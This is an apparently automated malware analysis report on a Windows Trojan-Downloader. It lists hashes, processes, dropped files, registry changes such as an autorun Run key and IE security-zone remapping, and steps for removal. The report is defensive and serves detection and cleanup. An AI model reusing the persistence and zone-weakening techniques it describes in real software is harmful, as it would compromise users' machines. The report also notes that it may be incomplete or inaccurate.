Trojan-Downloader.Win32.Adload.cfms (Kaspersky), Trojan.Generic.6764817 (B) (Emsisoft), Gen:Variant.Zusy.Elzob.3397 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.BHO.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 006a046dad50dfeff8f9b7e3b9719501
SHA1: a7fa25a328834c99ad8be22871f87b3ce969bb63
SHA256: 33d32bce8453a6aadce4e485a8e33792f6ef86fa3e729b1719e0590369aa6abf
SSDeep: 98304:06rnURbiRdDiuYH3C5IguxmSaTmzOI/tSI9bnkg7SHLTio/jvRUr:0NdSmdxmuz5scbn57SHiIRUr
Size: 5373952 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: PC Utilities Software Limited
Created at: 2011-09-24 15:44:20
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Downloader. Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
net.exe:524
net.exe:1136
net1.exe:1360
net1.exe:1556
lhkmtqb.exe:592
%original file name%.exe:1488
lhkmtqb.exe:336
mscorsvw.exe:1912
RhdmcnkZlr.EXE:1560
The Trojan injects its code into the following process(es):
CqxpeonGez.EXE:904
FprqlspZxc.EXE:1288
svchost.exe:232
svchost.exe:992
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process lhkmtqb.exe:592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\ lhkmtqb.exe (79104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE (51724 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RhdmcnkZlr.EXE (8308 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\DownRcord (780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c1[1].exe (51708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\c3[1].exe (7772 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\FprqlspZxc.EXE (14964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\auto[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].exe (14764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\RecordPath (0 bytes)
C:\%original file name%.exe (0 bytes)
The process FprqlspZxc.EXE:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\QQfm[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qlogin[1].htm (1714 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
The process %original file name%.exe:1488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\RCX7E.tmp (114025 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RecordPath (260 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe (39133 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe (0 bytes)
The process RhdmcnkZlr.EXE:1560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\all_async_popstate1_7b8ee197[1].js (9835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons_f72fb1cc[1].gif (5054 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\baidu[1].htm (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_logo1[1].png (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\nu_instant_search_1969bb02[1].js (17 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[1].txt (132 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\17434561[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.baidu[1].txt (127 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pz[1].htm (314 bytes)
%WinDir%\ime\appfht.exe (89 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[2].txt (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery-1.10.2.min_f2fb5194[1].js (3234 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\baidu_jgylogo3[1].gif (705 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
Registry activity
The process CqxpeonGez.EXE:904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D4 C9 19 04 A3 A6 88 62 22 00 42 5C 5F 96 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process net.exe:524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 AB ED B9 EC 71 76 30 50 4E 81 47 3B E6 60 70"
The process net.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC BB 5F 7A A3 E0 C6 1F C0 65 43 F9 AE 9E 85 90"
The process net1.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 D0 1E 4D 80 FF CD CF 18 C3 F3 2A B5 CA 57 6E"
The process net1.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 D7 BE 41 8D 8F 18 F1 62 CC 80 3A 2F B2 61 3B"
The process lhkmtqb.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F AB 8F 11 F9 E9 8F E3 8D 77 D1 EF A9 1A 0B 84"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process FprqlspZxc.EXE:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014122820141229\"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CachePrefix" = ":2014122820141229:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 1C 98 FB B8 AE 14 93 C1 66 C9 E4 EC B2 C3 A2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CacheOptions" = "11"
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122820141229]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 34 7F 14 EA C5 0C 92 0E 30 17 6A 3E 9C 18 B9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process lhkmtqb.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 6C CB 69 D9 12 7C 81 14 E2 5B F5 4E FD 80 DF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"
The process RhdmcnkZlr.EXE:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\VB and VBA Program Settings\QQID\Value]
"QQID" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "RhdmcnkZlr.EXE"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1418021643"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 39 A4 B2 E7 70 50 37 B9 94 3A 82 B3 4D 8B 4B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RhdmcnkZlr" = "c:\windows\ime\appfht.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
7c856d99209e3a45a548a7017fe87173 | c:\Documents and Settings\All Users\Application Data\DownloadSave\ lhkmtqb.exe |
caa4031258dd0af2aadfee60ab909abc | c:\Documents and Settings\All Users\Application Data\DownloadSave\CqxpeonGez.EXE |
55db4f3b5b28dbc176eea7bd195ff1a5 | c:\Documents and Settings\All Users\Application Data\DownloadSave\FprqlspZxc.EXE |
7c856d99209e3a45a548a7017fe87173 | c:\Documents and Settings\All Users\Application Data\DownloadSave\lhkmtqb.exe |
caa4031258dd0af2aadfee60ab909abc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c1[1].exe |
55db4f3b5b28dbc176eea7bd195ff1a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].exe |
b03789a726a2e0d65fe581fb6afc4b17 | c:\WINDOWS\system32\chrome.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net.exe:524
net.exe:1136
net1.exe:1360
net1.exe:1556
lhkmtqb.exe:592
%original file name%.exe:1488
lhkmtqb.exe:336
mscorsvw.exe:1912
RhdmcnkZlr.EXE:1560
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\DownloadSave\ lhkmtqb.exe (79104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE (51724 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RhdmcnkZlr.EXE (8308 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\DownRcord (780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c1[1].exe (51708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\c3[1].exe (7772 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\FprqlspZxc.EXE (14964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\auto[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].exe (14764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\QQfm[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xui[1].js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qlogin[1].htm (1714 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RCX7E.tmp (114025 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\RecordPath (260 bytes)
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe (39133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\all_async_popstate1_7b8ee197[1].js (9835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\icons_f72fb1cc[1].gif (5054 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\baidu[1].htm (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bd_logo1[1].png (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\nu_instant_search_1969bb02[1].js (17 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@120.24.81[1].txt (132 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\17434561[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.baidu[1].txt (127 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5300 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pz[1].htm (314 bytes)
%WinDir%\ime\appfht.exe (89 bytes)
